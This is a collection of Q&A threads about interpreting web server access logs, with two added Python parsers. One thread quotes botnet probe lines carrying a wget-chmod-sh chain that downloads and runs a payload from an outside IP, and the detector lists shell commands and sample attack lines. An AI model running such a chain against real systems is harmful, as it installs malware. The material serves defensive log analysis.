Flash object makes MySQL increment by 2 - php

I have a page with a flash object on it, and I would like to count the pageviews by incrementing a field by 1 in my database.
The query works fine (tested it in phpMyAdmin) and the function gets executed only once, but still the field gets incremented by 2 every time I reload the page.
When I remove the flash object from the page, the field is incremented only by 1.
Can someone explain why this is the case, and how I can prevent this behaviour?
Thanks a lot!
PS: This guy seems to have the same problem, but no solution is posted...
mysql wrong column increment
EDIT:
My logs show the following:
::1 - - [24/Aug/2013:13:42:16 +0200] "GET /page HTTP/1.1" 200 8008 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36"
::1 - - [24/Aug/2013:13:42:17 +0200] "GET /page HTTP/1.1" 200 8008 "http://localhost/page" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36"

I am quite sure, the relevant page is loaded twice in many instances, which makes for two increments. A page loading twice is what happens in at least two cases:
My flash block extension, if I chose to activate flash
Some AV/SmartScreen or whatever, that preloads the page elsewhere to check it for Flash threats
Check your webserver logs to verify!


Which type of hacking attempt is this? Accessing inexistent shell file from inexistent URL

I use Wordpress on my site, recently I blocked a hacker that infected my site with A LOT of backdoors (thousands of backdoors, literally). I spent one and a half months to beat him. It wasn't my fault, the guy who was on my job before me had never updated the site.
After this, I noticed some strange access to files that just don't exist, and I think that the hacker is trying to find known exploits from wordpress plugins that I don't use. It is ok, I don't care at all. But one of those tries caught my attention.
95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
94.200.107.2 - - [17/Jan/2020:13:52:28 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
197.226.122.184 - - [17/Jan/2020:14:57:36 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
I am hiding part of URL, sorry.
The IPs always change, even with consecutive requests with less than one second of difference, maybe a DDoS. The user-agent commonly changes too, there is everything here: iPhone, iPad, Android, Windows 7, 8, 10, Firefox, Google Chrome, Internet Explorer... But Linux and Mac. Those 3 requests are the only exception.
I noticed that there are some shell commands at the URL. These ones:
cd /tmp;
rm -rf .j;
wget http://91.92.66.124/..j/.j;
chmod 777 .j;
sh .j;
echo DONE HTTP/1.1
There is no folder or file with this name in my /tmp directory.
This "karin" URL was an old site that hasn't existed for a long time. I don't know how he knows this URL, even I didn't know. Every time I try to access some URL that is configured on NGINX, but whose path doesn't exist like this karin, I get a 404 error. But those tries gave a 400 error.
404 is normal, it is because there is nothing here. But 400? It means that there is something here, but it couldn't process the data sent. I removed the nginx configuration for this URL, and I tried it in other URLs. I always got a 404 error, I tried this:
***.***.***.*** - - [17/Jan/2020:15:29:20 -0300] "joa***com.br" "GET /shell?cd+/var/www/html/conf;mkdir+teste HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" "-"
So my question is: Should I be scared of these commands returning a 400 error on this URL? Why can't I reproduce this? Apparently those tries failed, should I be sure that they failed? Which type of attack is this? I never heard about a "shell script injection by URL" like this.
It is an automatic scan made by scripts looking for web servers with bashdoor vulnerabilities.
You can, as a precaution, block all urls that contain words like shell. This type of scan is common and a webserver firewall can easily handle attack prevention.
This looks like a request from the Mozi Botnet, a botnet that searches for backdoor shells on IoT devices.
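A way to find this kind of probe in an access log and see how the server answered it, given as an added example that is not part of the original posts. The sample lines are constructed (documentation IP ranges and a placeholder host name), and the list of command names and the status-based triage rule are assumptions chosen for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request line and status as written by both Apache and nginx access logs.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# nginx writes '"', '\' and non-printable bytes as \xHH in its access log.
NGINX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')
# A shell separator directly followed by a command (illustrative list, an assumption).
CHAINED = re.compile(r'(?:;|\|\||&&|\||`|\$\()\s*(wget|curl|chmod|sh|bash|rm|tftp)\b')

def decode_target(text):
    """Undo nginx \\xHH escaping, then URL-decode ('+' becomes a space)."""
    return unquote_plus(NGINX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text))

def scan(lines):
    """Return one record per request whose query string chains shell commands."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        commands = CHAINED.findall(decode_target(query))
        if commands:
            status = int(m["status"])
            hits.append({
                "client": line.split(" ", 1)[0],
                "path": path,
                "commands": commands,
                "status": status,
                # Triage rule (assumption): a 4xx means the server refused the
                # request; any other status deserves a closer look.
                "needs_review": not 400 <= status < 500,
            })
    return hits

# Constructed sample lines in the log layout shown in the question.
SAMPLE = [
    r'203.0.113.7 - - [17/Jan/2020:10:17:29 -0300] "example.test" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/198.51.100.9/.j;chmod+777+.j;sh+.j HTTP/1.1" 400 552 "-" "Mozilla/5.0" "-"',
    r'203.0.113.8 - - [17/Jan/2020:10:18:02 -0300] "example.test" "GET /search?q=shell+scripts;+a+guide HTTP/1.1" 200 8008 "-" "Mozilla/5.0" "-"',
    r'203.0.113.9 - - [17/Jan/2020:10:19:40 -0300] "example.test" "GET /cgi-bin/status?x=1%3Bwget%20http://198.51.100.9/a HTTP/1.1" 200 120 "-" "Mozilla/5.0" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The first sample line is reported with a 400 and no review flag, the ordinary search request is not reported at all, and the third line is flagged because the server answered 200.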

Is "POST /?fgko=vkma" a valid post request?

I have found lots of single requests in my access logs, that is, a "POST" request followed by "/", then a question mark ("?") followed by a few random characters which then equal to more random characters.
For example:
ps485115.dreamhost.com - - [31/Dec/2018:09:53:28 -0600] "POST /?fgko=vkma HTTP/1.1" 403 308 "http://example.com/?fgko=vkma" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
Sometimes that's the only request to the server that I can see from the ip address who's accessing my site (probably because just like in the example above, according to the access log, the visitor was already blocked).

How can I make more secure in my system? I can see some intruder trying to hack my web application [closed]

I can see in my application log some 404 error message like below
ERROR - 2018-09-07 05:31:50 --> 404 Page Not Found: Robotstxt/index
ERROR - 2018-09-07 05:31:51 --> 404 Page Not Found: Xmlrpcphp/index
ERROR - 2018-09-07 05:31:51 --> 404 Page Not Found: Blog/robots.txt
ERROR - 2018-09-07 05:31:52 --> 404 Page Not Found: Blog/index
ERROR - 2018-09-07 05:31:52 --> 404 Page Not Found: Wordpress/index
ERROR - 2018-09-07 05:31:52 --> 404 Page Not Found: Wp/index
ERROR - 2018-09-07 05:31:52 --> 404 Page Not Found: Robotstxt/index
ERROR - 2018-09-07 05:31:53 --> 404 Page Not Found: Administrator/index.php
This is happening every day. I have a doubt that somebody is trying to hack my system, because I am sure we are not using open source library or system.
I even checked the server log as well; I can see some IP address, but this address keeps on changing every time, so I am not able to choose an IP blocker.
Server Log:
194.79.31.99 - - [07/Sep/2018:05:31:50 +0400] "GET /robots.txt HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
194.79.31.99 - - [07/Sep/2018:05:31:50 +0400] "GET / HTTP/1.1" 307 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
194.79.31.99 - - [07/Sep/2018:05:31:51 +0400] "GET /xmlrpc.php?rsd HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
194.79.31.99 - - [07/Sep/2018:05:31:51 +0400] "GET /blog/robots.txt HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
194.79.31.99 - - [07/Sep/2018:05:31:51 +0400]
Platform: PHP/Mysql
Server : linux
I already protect my directory listing by htaccess.
How can I make my system more secure? Please help me...
It is normal your system gets attacked when it comes online. Intruders are running scripts to test for known vulnerabilities. It has nothing to do with open source or closed source libraries, both can be safe or vulnerable.
What you must do when you go on the internet with a machine is having a good professional system-admin check and maintain your machine. This is not something that someone with no deep knowledge of system-security can do.

Android browser issues HEAD request then GET, but PHP session is lost

A PHP application loses session data only in Android browser and only when logs show a HEAD request was issued immediately prior to the GET request.
Success ...
99.123.321.99 - - [05/Oct/2016:11:12:46 -0500] "GET /Success.php?response=Y HTTP/1.1" 200 6772
No session ...
98.12.21.89 - - [04/Oct/2016:22:17:15 -0500] "HEAD /Success.php?response=Y HTTP/1.1" 200 -
98.12.21.89 - - [04/Oct/2016:22:17:15 -0500] "GET /Success.php?response=Y HTTP/1.1" 200 3007
User agents are comparable, except on requests which lose the session data (returning Apache-HttpClient/UNAVAILABLE (java 1.4)) ...
99.123.321.99 Mozilla/5.0 (Linux; Android 6.0; LG-H901 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36
98.12.21.89 Mozilla/5.0 (Linux; Android 6.0.1; SM-G925T Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Mobile Safari/537.36
98.12.21.89 Apache-HttpClient/UNAVAILABLE (java 1.4)
What causes the Android browser to act in this manner?
What steps can be taken to 'work around' the behavior (and preserve session data)?
It is likely that the application will be rewritten with application defined session data instead of relying upon native PHP sessions, but an immediate work around would be helpful.
Thanks in advance!

Can someone please explain me what does this log statement mean?

I've a website developed using PHP.
I encountered one major issue on my website, a security breach. So I checked the access logs of apache present at location "/var/log/apache2/access.log" on the server.
I got the following log which caused the error, but I'm not able to understand what each part of this log means. Can someone please give me a step-by-step explanation of the below log?
70.39.61.42 - - [12/Jul/2015:17:05:12 +0000] "POST /user/register/javascript.void(0)/index.php?do=/user/register/ HTTP/1.1" 302 398 "http://www.mywebsite.com/user/register/javascript.void(0)" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
Actually this is the request which has created a major issue on my website. But I'm not able to figure out what parameters that request contained and what was the response, etc., etc.
Thanks in advance.
70.39.61.42
This is an IP address of someone who sent a request to your server
[12/Jul/2015:17:05:12 +0000]
This is the date when the perpetrator did it
"POST /user/register/javascript.void(0)/index.php?do=/user/register/ HTTP/1.1"
This shows that a POST request was sent to your server at the given URL
302 - This is a status code of the response - HTTP 302
398 - Indicates the size of the response sent
"http://www.mywebsite.com/user/register/javascript.void(0)"
This is a URL address of where the perpetrator came from
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
This is the user agent of the visitor.
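The same field-by-field breakdown done in code, as an added example that is not part of the original answer. It goes a little further than the answer: it also splits the request into method, path and query parameters, and it accepts lines without the referer and user-agent fields, like the HEAD line in the Android question above. Both sample lines are copied from this page; the function and field names are choices made for this example.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# The last two quoted fields are optional so "common" format lines parse as well.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE = re.compile(
    r'(\S+) (\S+) (\S+) \[([^\]]+)\] ' + QUOTED + r' (\d{3}) (\d+|-)'
    r'(?: ' + QUOTED + ' ' + QUOTED + ')?'
)

def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if malformed."""
    m = LINE.match(line)
    if m is None:
        return None
    host, ident, user, when, request, status, size, referer, agent = m.groups()
    rec = {
        "client": host, "ident": ident, "user": user,
        "time": datetime.strptime(when, "%d/%b/%Y:%H:%M:%S %z"),
        "status": int(status),
        "size": 0 if size == "-" else int(size),   # "-" means no body was sent
        "referer": referer, "agent": agent,
        "method": None, "path": None, "query": {},
    }
    parts = request.split(" ")
    if len(parts) == 3:                             # METHOD target PROTOCOL
        url = urlsplit(parts[1])
        rec.update(method=parts[0], path=url.path,
                   query=parse_qs(url.query, keep_blank_values=True))
    # This log format records the URL only; the body of a POST is not in it.
    return rec

# Two lines quoted on this page: the POST under discussion and a HEAD without referer.
POST_LINE = ('70.39.61.42 - - [12/Jul/2015:17:05:12 +0000] "POST /user/register/'
             'javascript.void(0)/index.php?do=/user/register/ HTTP/1.1" 302 398 '
             '"http://www.mywebsite.com/user/register/javascript.void(0)" '
             '"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
             'Chrome/36.0.1985.125 Safari/537.36"')
HEAD_LINE = ('98.12.21.89 - - [04/Oct/2016:22:17:15 -0500] '
             '"HEAD /Success.php?response=Y HTTP/1.1" 200 -')

if __name__ == "__main__":
    for key, value in parse_line(POST_LINE).items():
        print(f"{key:8} {value}")
```

For the POST line the only parameter that can be recovered is do=/user/register/ from the query string; the submitted form fields were sent in the request body and do not appear in the access log.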
